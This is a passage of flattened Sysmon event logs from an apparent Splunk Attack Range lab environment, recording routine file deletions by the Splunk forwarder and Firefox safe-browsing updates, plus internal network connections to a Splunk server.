Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F0F38DA28A88832B17B5700073A183A,SHA256=8041AD64BA212FA8608D97E48CA5D7A37531564920B420ED57FB9C05C142BE16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:41.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BD9A643BE4EFA8342C81F63B9616F4F,SHA256=2B099FA0EB2DC2319777163EA602FA8A0D553A316321F7E013F77AFB18641052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:42.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A6386750B26D98AD27300C426193038,SHA256=3C67A9B0AE2DB2AC6B4AB735FF2A379596A8C982B2E46C055F36607F117404FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:42.704{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A9AB778CAD6D3E1B8C45E175E36F3BA,SHA256=8895746A75B9DF48233149EBB4F76D4A2D280DE85100A9B5AC7F177521A614FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:33.683{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50881-false10.0.1.12-8000- 23542300x8000000000000000805833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:43.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A927449DCA41E92D42364980116CC0,SHA256=A0488E43655A3BD4F78B46373A0A3D5B43145E9B83FE42F88C2688595A33583F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:43.737{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD980509A1B674865E43150F2CBCA7CB,SHA256=B1676F348FDD8FF03490085DD5D3C74B4652F650C3C58C87DBDD0AC0B8D5D72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:44.939{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F7A3BA4E45416FF5C64FAC0642BA958,SHA256=1C95EB5BB1C2A5E8A501292AD1F3D22650D94D29EAA4D09E4E21EA60F14940B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:44.752{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83F4FA09E7A5CA7B5CF9E142308132B5,SHA256=B87665074FA00B61E6C1733A93C8E517BDDDC5ACD99B19D2EEAB3CFB9AB707A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:45.954{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A9E4FD47027A975781D4F18F23EB9EC,SHA256=20257230C6A42846DEF39449425536EE60784B90516357167B67E9AE89BBBE48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:45.783{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17E6F06343C33C9D6ABBE4E754656F50,SHA256=84787243B38FD7482E828453F1A10036A1D01D84E36CD08918200894450B4E49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:46.800{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F158474B8AD3BA3F58A84C26F7F04AB0,SHA256=DB23B731FDF952502830B1D73C1C012EAF09891E6498F6A2F84C440F212DF1C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:44.337{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57136-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:47.828{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=254C77D06EDCCB468435E3D330F66608,SHA256=A1B62A57C9CFFC77A5DE045735C5CC7A209976A466DE805621FD32321EF0DEFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:47.032{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72B115BEE86B4C7956C1B39950606AB5,SHA256=48DA28841ABAF52537C04CF93986CC44F53E46AF246756638187C2D09984F198,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:39.640{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50882-false10.0.1.12-8000- 23542300x80000000000000001045583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=0E6406BCED06B69AEB6C8CA463C0EBAB,SHA256=884CCC1F3FAAB666B5DAE09256AD409EE961AC8E8EB0DF4B9144DF09CFDD0035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=5AD4772D4BE6E9CC7CFA00B64B6CE71A,SHA256=C324FCF91D4B541EB93422BDD5FA434E39A752B6D7A93D78E70472F6D9B1EF2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=23F92D6A4085DA3A049409C9EF6E6F24,SHA256=9F6D9C12BB68A8D0EE3F884519916D7F3D174C4F85BFE2BD208CE27A4D1E1D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=EA86E0097B81FDBDEE3F12AC90CA6410,SHA256=6A242B62530E38DDCFD272643F6CC44EDC0208C69DC3022D6CC273F4C7E79AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=8DC78A562E1B268958A981D0AD7EAD74,SHA256=2A960282D759EAE224A8A47ABAD7A54DF042460DF0E5AC83A793FA822615FB83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=3B53A80D80584F5F16860FB04FBBB50C,SHA256=578B167D678436BE970332CB1F2B38D237BBFD6DAF46C2D565F0A457F7C00D6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=630E6BAA0AB0AD54050AFA8D0A5A478C,SHA256=7E1952C7293F78C27C13E8FB5DCAFA94E9439A6A4B342BCEC4DBEF4B8B99E977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=5A35E65CADA1885B6796D1B3FE56E5F8,SHA256=35A1BF0FF6DD2B70DA5F89611891D413808DDE1510D03D788FF48A214AFA7CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=E72E6B0165636DAE364CC43097FCD4E9,SHA256=3FE594D286D351B102E94676FD8A91B8FA0B3FDDD151336DDCE8C9BA2CFCFB50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=318288F5909637E0C3285C0942D72FF4,SHA256=F2BB9D40F7237C0E6D8EA96DFA2E864BD1264EB191C52BDBF16488D9466BC300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=F7A173C65979416711FAFF47FADFBB44,SHA256=7F018CC32CF471750B6C5322E27E4F1C38097C414E7C6DC6AF9CF31E607431A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=5C71167AC9642FCF7752093F77FBBC89,SHA256=6714F7FBADCCB013DA1D8ECEFA6368A7D193E1F2460477F8AC304EDCF8637AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=BFED06667174B0D03EE7F88A3DDC9A8C,SHA256=7AE5584755089D28C3A52DCF1EB86E62D4F2E377D61A7D549C6D4EBD53F39B26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=E6AAB64DC2799B4ECC6A6D18F86BD283,SHA256=D72FA31B50E9164371C5B7A3CCA257B99CE12D900FB07DEF942361D76299F5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=16E5F327975AC215E9EFA4A4FC5262F5,SHA256=4698D628493E91E42494C8343B7E6469DFC1BFB1F771258C2FB556E84EF314B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=C3757E7620737B3B6500073B370852FE,SHA256=34B07244F673343E9AC1C775B455C0A60AA95439E83A70B0C6A24E504A88F4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:48.891{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.891{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=8D9E3EEEE577DCE4B0062413A081F9F2,SHA256=D0E3356B67A0BB9BD101D87FA6E23EC2699CC8A25564CD88076663DACF73A9CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.891{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=2CC22CF356532158115AB8A0851A9A80,SHA256=6B106FD00C6E27909C9779448E5BDA5FFB96FE2A6FF42636A662AB411D9906DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.891{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=630E6BAA0AB0AD54050AFA8D0A5A478C,SHA256=7E1952C7293F78C27C13E8FB5DCAFA94E9439A6A4B342BCEC4DBEF4B8B99E977,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.870{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.838{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE8B9F834041C9187460E4FAC04CD81B,SHA256=45DCEDF8646C0885AFD9F438993F8E3526A276EA9B7BDD442FE5309CACFD5A5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:48.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E04BCC7C2AF8B0E35C2F3C2AD6389D7,SHA256=F02827AA2E31C437E7CBA0E592CDE86CE37BBE3FDD6A052664EC1926E45D0BE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.823{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
